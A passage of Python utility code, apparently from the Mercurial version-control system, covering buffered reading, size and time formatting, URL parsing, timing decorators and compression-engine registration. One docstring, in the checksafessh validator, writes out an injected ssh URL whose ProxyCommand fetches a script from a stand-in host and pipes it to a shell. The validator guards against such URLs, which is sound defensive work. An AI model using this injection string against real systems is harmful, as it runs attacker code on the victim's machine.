                left -= chunkremaining
                queue.popleft()
                # offset == 0 is enabled by block above, so this won't merely
                # copy via ``chunk[0:]``.
                buf.append(chunk[offset:])
                self._chunkoffset = 0

            # Partial chunk needed.
            else:
                buf.append(chunk[offset:offset + left])
                self._chunkoffset += left
                left -= chunkremaining

        return ''.join(buf)

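# Illustrative sketch of chunkbuffer rechunking (chunk sizes are examples
# only; real callers feed it protocol or file chunks):
#
#   cb = chunkbuffer(iter([b'abc', b'defg']))
#   cb.read(2)   # -> 'ab'    (partial first chunk; offset advances)
#   cb.read(5)   # -> 'cdefg' (rest of first chunk plus all of second)
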
def filechunkiter(f, size=131072, limit=None):
    """Create a generator that produces the data in the file, size
    (default 131072) bytes at a time, up to optional limit (default is
    to read all data). Chunks may be less than size bytes if the
    chunk is the last chunk in the file, or the file is a socket or
    some other type of file that sometimes reads less data than is
    requested."""
    assert size >= 0
    assert limit is None or limit >= 0
    while True:
        if limit is None:
            nbytes = size
        else:
            nbytes = min(limit, size)
        s = nbytes and f.read(nbytes)
        if not s:
            break
        if limit:
            limit -= len(s)
        yield s

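# Illustrative sketch, assuming an in-memory file object:
#
#   fp = pycompat.bytesio(b'x' * 300000)
#   [len(c) for c in filechunkiter(fp)]           # -> [131072, 131072, 37856]
#   fp.seek(0)
#   [len(c) for c in filechunkiter(fp, limit=5)]  # -> [5]
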
class cappedreader(object):
    """A file object proxy that allows reading up to N bytes.

    Given a source file object, instances of this type allow reading up to
    N bytes from that source file object. Attempts to read past the allowed
    limit are treated as EOF.

    It is assumed that I/O is not performed on the original file object
    in addition to I/O that is performed by this instance. If there is,
    state tracking will get out of sync and unexpected results will ensue.
    """
    def __init__(self, fh, limit):
        """Allow reading up to <limit> bytes from <fh>."""
        self._fh = fh
        self._left = limit

    def read(self, n=-1):
        if not self._left:
            return b''

        if n < 0:
            n = self._left

        data = self._fh.read(min(n, self._left))
        self._left -= len(data)
        assert self._left >= 0

        return data

    def readinto(self, b):
        res = self.read(len(b))
        if res is None:
            return None

        b[0:len(res)] = res
        return len(res)

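# Illustrative sketch, assuming an in-memory source file object:
#
#   fh = pycompat.bytesio(b'0123456789')
#   reader = cappedreader(fh, 4)
#   reader.read(2)   # -> '01'
#   reader.read()    # -> '23'  (stops at the cap)
#   reader.read()    # -> ''    (the cap now behaves like EOF)
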
def unitcountfn(*unittable):
    '''return a function that renders a readable count of some quantity'''

    def go(count):
        for multiplier, divisor, format in unittable:
            if abs(count) >= divisor * multiplier:
                return format % (count / float(divisor))
        return unittable[-1][2] % count

    return go

def processlinerange(fromline, toline):
    """Check that linerange <fromline>:<toline> makes sense and return a
    0-based range.

    >>> processlinerange(10, 20)
    (9, 20)
    >>> processlinerange(2, 1)
    Traceback (most recent call last):
        ...
    ParseError: line range must be positive
    >>> processlinerange(0, 5)
    Traceback (most recent call last):
        ...
    ParseError: fromline must be strictly positive
    """
    if toline - fromline < 0:
        raise error.ParseError(_("line range must be positive"))
    if fromline < 1:
        raise error.ParseError(_("fromline must be strictly positive"))
    return fromline - 1, toline

bytecount = unitcountfn(
    (100, 1 << 30, _('%.0f GB')),
    (10, 1 << 30, _('%.1f GB')),
    (1, 1 << 30, _('%.2f GB')),
    (100, 1 << 20, _('%.0f MB')),
    (10, 1 << 20, _('%.1f MB')),
    (1, 1 << 20, _('%.2f MB')),
    (100, 1 << 10, _('%.0f KB')),
    (10, 1 << 10, _('%.1f KB')),
    (1, 1 << 10, _('%.2f KB')),
    (1, 1, _('%.0f bytes')),
    )

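# Illustrative sketch of the resulting formatter: the table above keeps
# roughly three significant digits at every magnitude:
#
#   bytecount(42)          # -> '42 bytes'
#   bytecount(1536)        # -> '1.50 KB'
#   bytecount(105 * 1024)  # -> '105 KB'
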
class transformingwriter(object):
    """Writable file wrapper to transform data by function"""

    def __init__(self, fp, encode):
        self._fp = fp
        self._encode = encode

    def close(self):
        self._fp.close()

    def flush(self):
        self._fp.flush()

    def write(self, data):
        return self._fp.write(self._encode(data))

# Matches a single EOL which can either be a CRLF where repeated CR
# are removed or a LF. We do not care about old Macintosh files, so a
# stray CR is an error.
_eolre = remod.compile(br'\r*\n')

def tolf(s):
    return _eolre.sub('\n', s)

def tocrlf(s):
    return _eolre.sub('\r\n', s)

def _crlfwriter(fp):
    return transformingwriter(fp, tocrlf)

if pycompat.oslinesep == '\r\n':
    tonativeeol = tocrlf
    fromnativeeol = tolf
    nativeeolwriter = _crlfwriter
else:
    tonativeeol = pycompat.identity
    fromnativeeol = pycompat.identity
    nativeeolwriter = pycompat.identity

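# Illustrative sketch of the EOL helpers (the platform-independent parts):
#
#   tolf(b'a\r\nb\n')    # -> 'a\nb\n'
#   tocrlf(b'a\nb\r\n')  # -> 'a\r\nb\r\n'
#   w = nativeeolwriter(pycompat.bytesio())
#   w.write(b'x\n')      # underlying buffer gets 'x\r\n' on Windows,
#                        # 'x\n' elsewhere
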
if (pyplatform.python_implementation() == 'CPython' and
    sys.version_info < (3, 0)):
    # There is an issue in CPython that some IO methods do not handle EINTR
    # correctly. The following table shows what CPython version (and functions)
    # are affected (buggy: has the EINTR bug, okay: otherwise):
    #
    #             | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
    # --------------------------------------------------
    # fp.__iter__ | buggy   | buggy           | okay
    # fp.read*    | buggy   | okay [1]        | okay
    #
    # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
    #
    # Here we work around the EINTR issue for fileobj.__iter__. Other methods
    # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
    #
    # Although we can work around the EINTR issue for fp.__iter__, it is
    # slower: "for x in fp" is 4x faster than "for x in iter(fp.readline, '')"
    # in CPython 2, because CPython 2 maintains an internal readahead buffer
    # for fp.__iter__ but not other fp.read* methods.
    #
    # On modern systems like Linux, the "read" syscall cannot be interrupted
    # when reading "fast" files like on-disk files. So the EINTR issue only
    # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
    # files approximately as "fast" files and use the fast (unsafe) code path,
    # to minimize the performance impact.
    if sys.version_info >= (2, 7, 4):
        # fp.readline deals with EINTR correctly, use it as a workaround.
        def _safeiterfile(fp):
            return iter(fp.readline, '')
    else:
        # fp.read* are broken too, manually deal with EINTR in a stupid way.
        # note: this may block longer than necessary because of bufsize.
        def _safeiterfile(fp, bufsize=4096):
            fd = fp.fileno()
            line = ''
            while True:
                try:
                    buf = os.read(fd, bufsize)
                except OSError as ex:
                    # os.read only raises EINTR before any data is read
                    if ex.errno == errno.EINTR:
                        continue
                    else:
                        raise
                line += buf
                if '\n' in buf:
                    splitted = line.splitlines(True)
                    line = ''
                    for l in splitted:
                        if l[-1] == '\n':
                            yield l
                        else:
                            line = l
                if not buf:
                    break
            if line:
                yield line

    def iterfile(fp):
        fastpath = True
        if type(fp) is file:
            fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
        if fastpath:
            return fp
        else:
            return _safeiterfile(fp)
else:
    # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
    def iterfile(fp):
        return fp

def iterlines(iterator):
    for chunk in iterator:
        for line in chunk.splitlines():
            yield line

def expandpath(path):
    return os.path.expanduser(os.path.expandvars(path))

def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
    """Return the result of interpolating items in the mapping into string s.

    prefix is a single character string, or a two character string with
    a backslash as the first character if the prefix needs to be escaped in
    a regular expression.

    fn is an optional function that will be applied to the replacement text
    just before replacement.

    escape_prefix is an optional flag that allows using doubled prefix for
    its escaping.
    """
    fn = fn or (lambda s: s)
    patterns = '|'.join(mapping.keys())
    if escape_prefix:
        patterns += '|' + prefix
        if len(prefix) > 1:
            prefix_char = prefix[1:]
        else:
            prefix_char = prefix
        mapping[prefix_char] = prefix_char
    r = remod.compile(br'%s(%s)' % (prefix, patterns))
    return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)

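# Illustrative sketch (the mapping and strings are examples only); note the
# prefix is escaped because '$' is special in regular expressions:
#
#   interpolate(br'\$', {b'foo': b'bar'}, b'say $foo')
#       # -> 'say bar'
#   interpolate(br'\$', {b'foo': b'bar'}, b'say $foo $$', escape_prefix=True)
#       # -> 'say bar $'
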
def getport(port):
    """Return the port for a given network service.

    If port is an integer, it's returned as is. If it's a string, it's
    looked up using socket.getservbyname(). If there's no matching
    service, error.Abort is raised.
    """
    try:
        return int(port)
    except ValueError:
        pass

    try:
        return socket.getservbyname(pycompat.sysstr(port))
    except socket.error:
        raise error.Abort(_("no port number associated with service '%s'")
                          % port)

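# Illustrative sketch:
#
#   getport(8080)     # -> 8080 (integers pass through)
#   getport(b'http')  # -> 80, via socket.getservbyname(), assuming the
#                     # local service database knows the name
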
class url(object):
    r"""Reliable URL parser.

    This parses URLs and provides attributes for the following
    components:

    <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>

    Missing components are set to None. The only exception is
    fragment, which is set to '' if present but empty.

    If parsefragment is False, fragment is included in query. If
    parsequery is False, query is included in path. If both are
    False, both fragment and query are included in path.

    See http://www.ietf.org/rfc/rfc2396.txt for more information.

    Note that for backward compatibility reasons, bundle URLs do not
    take host names. That means 'bundle://../' has a path of '../'.

    Examples:

    >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
    <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
    >>> url(b'ssh://[::1]:2200//home/joe/repo')
    <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
    >>> url(b'file:///home/joe/repo')
    <url scheme: 'file', path: '/home/joe/repo'>
    >>> url(b'file:///c:/temp/foo/')
    <url scheme: 'file', path: 'c:/temp/foo/'>
    >>> url(b'bundle:foo')
    <url scheme: 'bundle', path: 'foo'>
    >>> url(b'bundle://../foo')
    <url scheme: 'bundle', path: '../foo'>
    >>> url(br'c:\foo\bar')
    <url path: 'c:\\foo\\bar'>
    >>> url(br'\\blah\blah\blah')
    <url path: '\\\\blah\\blah\\blah'>
    >>> url(br'\\blah\blah\blah#baz')
    <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
    >>> url(br'file:///C:\users\me')
    <url scheme: 'file', path: 'C:\\users\\me'>

    Authentication credentials:

    >>> url(b'ssh://joe:xyz@x/repo')
    <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
    >>> url(b'ssh://joe@x/repo')
    <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>

    Query strings and fragments:

    >>> url(b'http://host/a?b#c')
    <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
    >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
    <url scheme: 'http', host: 'host', path: 'a?b#c'>

    Empty path:

    >>> url(b'')
    <url path: ''>
    >>> url(b'#a')
    <url path: '', fragment: 'a'>
    >>> url(b'http://host/')
    <url scheme: 'http', host: 'host', path: ''>
    >>> url(b'http://host/#a')
    <url scheme: 'http', host: 'host', path: '', fragment: 'a'>

    Only scheme:

    >>> url(b'http:')
    <url scheme: 'http'>
    """

    _safechars = "!~*'()+"
    _safepchars = "/!~*'()+:\\"
    _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match

    def __init__(self, path, parsequery=True, parsefragment=True):
        # We slowly chomp away at path until we have only the path left
        self.scheme = self.user = self.passwd = self.host = None
        self.port = self.path = self.query = self.fragment = None
        self._localpath = True
        self._hostport = ''
        self._origpath = path

        if parsefragment and '#' in path:
            path, self.fragment = path.split('#', 1)

        # special case for Windows drive letters and UNC paths
        if hasdriveletter(path) or path.startswith('\\\\'):
            self.path = path
            return

        # For compatibility reasons, we can't handle bundle paths as
        # normal URLS
        if path.startswith('bundle:'):
            self.scheme = 'bundle'
            path = path[7:]
            if path.startswith('//'):
                path = path[2:]
            self.path = path
            return

        if self._matchscheme(path):
            parts = path.split(':', 1)
            if parts[0]:
                self.scheme, path = parts
                self._localpath = False

        if not path:
            path = None
            if self._localpath:
                self.path = ''
                return
        else:
            if self._localpath:
                self.path = path
                return

            if parsequery and '?' in path:
                path, self.query = path.split('?', 1)
                if not path:
                    path = None
                if not self.query:
                    self.query = None

            # // is required to specify a host/authority
            if path and path.startswith('//'):
                parts = path[2:].split('/', 1)
                if len(parts) > 1:
                    self.host, path = parts
                else:
                    self.host = parts[0]
                    path = None
                if not self.host:
                    self.host = None
                    # path of file:///d is /d
                    # path of file:///d:/ is d:/, not /d:/
                    if path and not hasdriveletter(path):
                        path = '/' + path

            if self.host and '@' in self.host:
                self.user, self.host = self.host.rsplit('@', 1)
                if ':' in self.user:
                    self.user, self.passwd = self.user.split(':', 1)
                if not self.host:
                    self.host = None

            # Don't split on colons in IPv6 addresses without ports
            if (self.host and ':' in self.host and
                    not (self.host.startswith('[') and
                         self.host.endswith(']'))):
                self._hostport = self.host
                self.host, self.port = self.host.rsplit(':', 1)
                if not self.host:
                    self.host = None

            if (self.host and self.scheme == 'file' and
                    self.host not in ('localhost', '127.0.0.1', '[::1]')):
                raise error.Abort(_('file:// URLs can only refer to localhost'))

        self.path = path

        # leave the query string escaped
        for a in ('user', 'passwd', 'host', 'port',
                  'path', 'fragment'):
            v = getattr(self, a)
            if v is not None:
                setattr(self, a, urlreq.unquote(v))

    @encoding.strmethod
    def __repr__(self):
        attrs = []
        for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
                  'query', 'fragment'):
            v = getattr(self, a)
            if v is not None:
                attrs.append('%s: %r' % (a, v))
        return '<url %s>' % ', '.join(attrs)

    def __bytes__(self):
        r"""Join the URL's components back into a URL string.

        Examples:

        >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
        'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
        'http://user:pw@host:80/?foo=bar&baz=42'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
        'http://user:pw@host:80/?foo=bar%3dbaz'
        >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
        'ssh://user:pw@[::1]:2200//home/joe#'
        >>> bytes(url(b'http://localhost:80//'))
        'http://localhost:80//'
        >>> bytes(url(b'http://localhost:80/'))
        'http://localhost:80/'
        >>> bytes(url(b'http://localhost:80'))
        'http://localhost:80/'
        >>> bytes(url(b'bundle:foo'))
        'bundle:foo'
        >>> bytes(url(b'bundle://../foo'))
        'bundle:../foo'
        >>> bytes(url(b'path'))
        'path'
        >>> bytes(url(b'file:///tmp/foo/bar'))
        'file:///tmp/foo/bar'
        >>> bytes(url(b'file:///c:/tmp/foo/bar'))
        'file:///c:/tmp/foo/bar'
        >>> print(url(br'bundle:foo\bar'))
        bundle:foo\bar
        >>> print(url(br'file:///D:\data\hg'))
        file:///D:\data\hg
        """
        if self._localpath:
            s = self.path
            if self.scheme == 'bundle':
                s = 'bundle:' + s
            if self.fragment:
                s += '#' + self.fragment
            return s

        s = self.scheme + ':'
        if self.user or self.passwd or self.host:
            s += '//'
        elif self.scheme and (not self.path or self.path.startswith('/')
                              or hasdriveletter(self.path)):
            s += '//'
            if hasdriveletter(self.path):
                s += '/'
        if self.user:
            s += urlreq.quote(self.user, safe=self._safechars)
        if self.passwd:
            s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
        if self.user or self.passwd:
            s += '@'
        if self.host:
            if not (self.host.startswith('[') and self.host.endswith(']')):
                s += urlreq.quote(self.host)
            else:
                s += self.host
        if self.port:
            s += ':' + urlreq.quote(self.port)
        if self.host:
            s += '/'
        if self.path:
            # TODO: similar to the query string, we should not unescape the
            # path when we store it, the path might contain '%2f' = '/',
            # which we should *not* escape.
            s += urlreq.quote(self.path, safe=self._safepchars)
        if self.query:
            # we store the query in escaped form.
            s += '?' + self.query
        if self.fragment is not None:
            s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
        return s

    __str__ = encoding.strmethod(__bytes__)

    def authinfo(self):
        user, passwd = self.user, self.passwd
        try:
            self.user, self.passwd = None, None
            s = bytes(self)
        finally:
            self.user, self.passwd = user, passwd
        if not self.user:
            return (s, None)
        # authinfo[1] is passed to urllib2 password manager, and its
        # URIs must not contain credentials. The host is passed in the
        # URIs list because Python < 2.4.3 uses only that to search for
        # a password.
        return (s, (None, (s, self.host),
                    self.user, self.passwd or ''))

    def isabs(self):
        if self.scheme and self.scheme != 'file':
            return True # remote URL
        if hasdriveletter(self.path):
            return True # absolute for our purposes - can't be joined()
        if self.path.startswith(br'\\'):
            return True # Windows UNC path
        if self.path.startswith('/'):
            return True # POSIX-style
        return False

    def localpath(self):
        if self.scheme == 'file' or self.scheme == 'bundle':
            path = self.path or '/'
            # For Windows, we need to promote hosts containing drive
            # letters to paths with drive letters.
            if hasdriveletter(self._hostport):
                path = self._hostport + '/' + self.path
            elif (self.host is not None and self.path
                  and not hasdriveletter(path)):
                path = '/' + path
            return path
        return self._origpath

    def islocal(self):
        '''whether localpath will return something that posixfile can open'''
        return (not self.scheme or self.scheme == 'file'
                or self.scheme == 'bundle')

def hasscheme(path):
    return bool(url(path).scheme)

def hasdriveletter(path):
    return path and path[1:2] == ':' and path[0:1].isalpha()

def urllocalpath(path):
    return url(path, parsequery=False, parsefragment=False).localpath()

def checksafessh(path):
    """check whether a path / url is a potentially unsafe ssh url (SEC)

    This is a sanity check for ssh urls. ssh will parse the first item as
    an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
    Let's reject these potentially exploitable urls entirely and warn the
    user.

    Raises an error.Abort when the url is unsafe.
    """
    path = urlreq.unquote(path)
    if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
        raise error.Abort(_('potentially unsafe url: %r') %
                          (pycompat.bytestr(path),))

def hidepassword(u):
    '''hide user credential in a url string'''
    u = url(u)
    if u.passwd:
        u.passwd = '***'
    return bytes(u)

def removeauth(u):
    '''remove all authentication information from a url string'''
    u = url(u)
    u.user = u.passwd = None
    return bytes(u)

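# Illustrative sketch (the url is an example only):
#
#   hidepassword(b'http://joe:secret@host/repo')
#       # -> 'http://joe:***@host/repo'
#   removeauth(b'http://joe:secret@host/repo')
#       # -> 'http://host/repo'
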
timecount = unitcountfn(
    (1, 1e3, _('%.0f s')),
    (100, 1, _('%.1f s')),
    (10, 1, _('%.2f s')),
    (1, 1, _('%.3f s')),
    (100, 0.001, _('%.1f ms')),
    (10, 0.001, _('%.2f ms')),
    (1, 0.001, _('%.3f ms')),
    (100, 0.000001, _('%.1f us')),
    (10, 0.000001, _('%.2f us')),
    (1, 0.000001, _('%.3f us')),
    (100, 0.000000001, _('%.1f ns')),
    (10, 0.000000001, _('%.2f ns')),
    (1, 0.000000001, _('%.3f ns')),
    )

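# Illustrative sketch of the resulting formatter:
#
#   timecount(2.5)     # -> '2.500 s'
#   timecount(0.0015)  # -> '1.500 ms'
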
_timenesting = [0]

def timed(func):
    '''Report the execution time of a function call to stderr.

    During development, use as a decorator when you need to measure
    the cost of a function, e.g. as follows:

    @util.timed
    def foo(a, b, c):
        pass
    '''

    def wrapper(*args, **kwargs):
        start = timer()
        indent = 2
        _timenesting[0] += indent
        try:
            return func(*args, **kwargs)
        finally:
            elapsed = timer() - start
            _timenesting[0] -= indent
            stderr.write('%s%s: %s\n' %
                         (' ' * _timenesting[0], func.__name__,
                          timecount(elapsed)))
    return wrapper

_sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
              ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))

def sizetoint(s):
    '''Convert a space specifier to a byte count.

    >>> sizetoint(b'30')
    30
    >>> sizetoint(b'2.2kb')
    2252
    >>> sizetoint(b'6M')
    6291456
    '''
    t = s.strip().lower()
    try:
        for k, u in _sizeunits:
            if t.endswith(k):
                return int(float(t[:-len(k)]) * u)
        return int(t)
    except ValueError:
        raise error.ParseError(_("couldn't parse size: %s") % s)

class hooks(object):
    '''A collection of hook functions that can be used to extend a
    function's behavior. Hooks are called in lexicographic order,
    based on the names of their sources.'''

    def __init__(self):
        self._hooks = []

    def add(self, source, hook):
        self._hooks.append((source, hook))

    def __call__(self, *args):
        self._hooks.sort(key=lambda x: x[0])
        results = []
        for source, hook in self._hooks:
            results.append(hook(*args))
        return results

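# Illustrative sketch (not part of the original module): hooks registered
# under different source names run in lexicographic order of those names.
def _examplehooks():
    calls = []
    h = hooks()
    h.add('b-ext', lambda: calls.append('second'))
    h.add('a-ext', lambda: calls.append('first'))
    h()     # sorts by source name, so 'a-ext' runs before 'b-ext'
    assert calls == ['first', 'second']
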
def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
    '''Yields lines for a nicely formatted stacktrace.
    Skips the 'skip' last entries, then returns the last 'depth' entries.
    Each file+linenumber is formatted according to fileline.
    Each line is formatted according to line.
    If line is None, it yields:
      length of longest filepath+line number,
      filepath+linenumber,
      function

    Not to be used in production code, but very convenient while developing.
    '''
    entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
               for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
               ][-depth:]
    if entries:
        fnmax = max(len(entry[0]) for entry in entries)
        for fnln, func in entries:
            if line is None:
                yield (fnmax, fnln, func)
            else:
                yield line % (fnmax, fnln, func)

def debugstacktrace(msg='stacktrace', skip=0,
                    f=procutil.stderr, otherf=procutil.stdout, depth=0):
    '''Writes a message to f (stderr) with a nicely formatted stacktrace.
    Skips the 'skip' entries closest to the call, then shows 'depth' entries.
    By default it will flush stdout first.
    It can be used everywhere and intentionally does not require an ui object.
    Not to be used in production code, but very convenient while developing.
    '''
    if otherf:
        otherf.flush()
    f.write('%s at:\n' % msg.rstrip())
    for line in getstackframes(skip + 1, depth=depth):
        f.write(line)
    f.flush()

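# Illustrative sketch (not part of the original module): drop a one-line
# debugstacktrace() call into code under investigation to see how it was
# reached; 'dst' (defined near the end of this module) is a shorter alias.
def _exampledebugstacktrace():
    debugstacktrace('entering example', depth=5)
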
class dirs(object):
    '''a multiset of directory names from a dirstate or manifest'''

    def __init__(self, map, skip=None):
        self._dirs = {}
        addpath = self.addpath
        if safehasattr(map, 'iteritems') and skip is not None:
            for f, s in map.iteritems():
                if s[0] != skip:
                    addpath(f)
        else:
            for f in map:
                addpath(f)

    def addpath(self, path):
        dirs = self._dirs
        for base in finddirs(path):
            if base in dirs:
                dirs[base] += 1
                return
            dirs[base] = 1

    def delpath(self, path):
        dirs = self._dirs
        for base in finddirs(path):
            if dirs[base] > 1:
                dirs[base] -= 1
                return
            del dirs[base]

    def __iter__(self):
        return iter(self._dirs)

    def __contains__(self, d):
        return d in self._dirs

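# Illustrative sketch (not part of the original module): the pure-Python dirs
# class above counts files per directory prefix, so a directory stays a member
# until its last file is removed. (A C implementation may replace the class
# just below, with the same observable behavior.)
def _exampledirs():
    d = dirs(['a/b/c', 'a/d'])
    assert 'a' in d and 'a/b' in d
    d.delpath('a/b/c')
    assert 'a/b' not in d and 'a' in d   # 'a' still holds 'a/d'
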
if safehasattr(parsers, 'dirs'):
    dirs = parsers.dirs

def finddirs(path):
    pos = path.rfind('/')
    while pos != -1:
        yield path[:pos]
        pos = path.rfind('/', 0, pos)

# compression code

SERVERROLE = 'server'
CLIENTROLE = 'client'

compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
                                               (u'name', u'serverpriority',
                                                u'clientpriority'))

class compressormanager(object):
    """Holds registrations of various compression engines.

    This class essentially abstracts the differences between compression
    engines to allow new compression formats to be added easily, possibly from
    extensions.

    Compressors are registered against the global instance by calling its
    ``register()`` method.
    """
    def __init__(self):
        self._engines = {}
        # Bundle spec human name to engine name.
        self._bundlenames = {}
        # Internal bundle identifier to engine name.
        self._bundletypes = {}
        # Revlog header to engine name.
        self._revlogheaders = {}
        # Wire proto identifier to engine name.
        self._wiretypes = {}

    def __getitem__(self, key):
        return self._engines[key]

    def __contains__(self, key):
        return key in self._engines

    def __iter__(self):
        return iter(self._engines.keys())

    def register(self, engine):
        """Register a compression engine with the manager.

        The argument must be a ``compressionengine`` instance.
        """
        if not isinstance(engine, compressionengine):
            raise ValueError(_('argument must be a compressionengine'))

        name = engine.name()

        if name in self._engines:
            raise error.Abort(_('compression engine %s already registered') %
                              name)

        bundleinfo = engine.bundletype()
        if bundleinfo:
            bundlename, bundletype = bundleinfo

            if bundlename in self._bundlenames:
                raise error.Abort(_('bundle name %s already registered') %
                                  bundlename)
            if bundletype in self._bundletypes:
                raise error.Abort(_('bundle type %s already registered by %s') %
                                  (bundletype, self._bundletypes[bundletype]))

            # Only register the external-facing name if one was declared.
            if bundlename:
                self._bundlenames[bundlename] = name

            self._bundletypes[bundletype] = name

        wiresupport = engine.wireprotosupport()
        if wiresupport:
            wiretype = wiresupport.name
            if wiretype in self._wiretypes:
                raise error.Abort(_('wire protocol compression %s already '
                                    'registered by %s') %
                                  (wiretype, self._wiretypes[wiretype]))

            self._wiretypes[wiretype] = name

        revlogheader = engine.revlogheader()
        if revlogheader and revlogheader in self._revlogheaders:
            raise error.Abort(_('revlog header %s already registered by %s') %
                              (revlogheader, self._revlogheaders[revlogheader]))

        if revlogheader:
            self._revlogheaders[revlogheader] = name

        self._engines[name] = engine

    @property
    def supportedbundlenames(self):
        return set(self._bundlenames.keys())

    @property
    def supportedbundletypes(self):
        return set(self._bundletypes.keys())

    def forbundlename(self, bundlename):
        """Obtain a compression engine registered to a bundle name.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundlenames[bundlename]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forbundletype(self, bundletype):
        """Obtain a compression engine registered to a bundle type.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundletypes[bundletype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def supportedwireengines(self, role, onlyavailable=True):
        """Obtain compression engines that support the wire protocol.

        Returns a list of engines in prioritized order, most desired first.

        If ``onlyavailable`` is set, filter out engines that can't be
        loaded.
        """
        assert role in (SERVERROLE, CLIENTROLE)

        attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'

        engines = [self._engines[e] for e in self._wiretypes.values()]
        if onlyavailable:
            engines = [e for e in engines if e.available()]

        def getkey(e):
            # Sort first by priority, highest first. In case of tie, sort
            # alphabetically. This is arbitrary, but ensures output is
            # stable.
            w = e.wireprotosupport()
            return -1 * getattr(w, attr), w.name

        return list(sorted(engines, key=getkey))

    def forwiretype(self, wiretype):
        engine = self._engines[self._wiretypes[wiretype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forrevlogheader(self, header):
        """Obtain a compression engine registered to a revlog header.

        Will raise KeyError if the revlog header value isn't registered.
        """
        return self._engines[self._revlogheaders[header]]

compengines = compressormanager()

class compressionengine(object):
    """Base class for compression engines.

    Compression engines must implement the interface defined by this class.
    """
    def name(self):
        """Returns the name of the compression engine.

        This is the key the engine is registered under.

        This method must be implemented.
        """
        raise NotImplementedError()

    def available(self):
        """Whether the compression engine is available.

        The intent of this method is to allow optional compression engines
        that may not be available in all installations (such as engines relying
        on C extensions that may not be present).
        """
        return True

    def bundletype(self):
        """Describes bundle identifiers for this engine.

        If this compression engine isn't supported for bundles, returns None.

        If this engine can be used for bundles, returns a 2-tuple of strings of
        the user-facing "bundle spec" compression name and an internal
        identifier used to denote the compression format within bundles. To
        exclude the name from external usage, set the first element to ``None``.

        If bundle compression is supported, the class must also implement
        ``compressstream`` and ``decompressorreader``.

        The docstring of this method is used in the help system to tell users
        about this engine.
        """
        return None

    def wireprotosupport(self):
        """Declare support for this compression format on the wire protocol.

        If this compression engine isn't supported for compressing wire
        protocol payloads, returns None.

        Otherwise, returns ``compenginewireprotosupport`` with the following
        fields:

        * String format identifier
        * Integer priority for the server
        * Integer priority for the client

        The integer priorities are used to order the advertisement of format
        support by server and client. The highest integer is advertised
        first. Integers with non-positive values aren't advertised.

        The priority values are somewhat arbitrary and only used for default
        ordering. The relative order can be changed via config options.

        If wire protocol compression is supported, the class must also implement
        ``compressstream`` and ``decompressorreader``.
        """
        return None

    def revlogheader(self):
        """Header added to revlog chunks that identifies this engine.

        If this engine can be used to compress revlogs, this method should
        return the bytes used to identify chunks compressed with this engine.
        Else, the method should return ``None`` to indicate it does not
        participate in revlog compression.
        """
        return None

    def compressstream(self, it, opts=None):
        """Compress an iterator of chunks.

        The method receives an iterator (ideally a generator) of chunks of
        bytes to be compressed. It returns an iterator (ideally a generator)
        of bytes of chunks representing the compressed output.

        Optionally accepts an argument defining how to perform compression.
        Each engine treats this argument differently.
        """
        raise NotImplementedError()

    def decompressorreader(self, fh):
        """Perform decompression on a file object.

        Argument is an object with a ``read(size)`` method that returns
        compressed data. Return value is an object with a ``read(size)`` that
        returns uncompressed data.
        """
        raise NotImplementedError()

    def revlogcompressor(self, opts=None):
        """Obtain an object that can be used to compress revlog entries.

        The object has a ``compress(data)`` method that compresses binary
        data. This method returns compressed binary data or ``None`` if
        the data could not be compressed (too small, not compressible, etc).
        The returned data should have a header uniquely identifying this
        compression format so decompression can be routed to this engine.
        This header should be identified by the ``revlogheader()`` return
        value.

        The object has a ``decompress(data)`` method that decompresses
        data. The method will only be called if ``data`` begins with
        ``revlogheader()``. The method should return the raw, uncompressed
        data or raise a ``RevlogError``.

        The object is reusable but is not thread safe.
        """
        raise NotImplementedError()

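# Illustrative sketch (not part of the original module): the smallest possible
# custom engine is a name plus the stream methods; registering it makes it
# resolvable through the compengines manager. All names here are made up.
def _exampleregisterengine():
    class _identityengine(compressionengine):
        def name(self):
            return 'identity-example'

        def compressstream(self, it, opts=None):
            return it               # pass chunks through untouched

        def decompressorreader(self, fh):
            return fh

    compengines.register(_identityengine())
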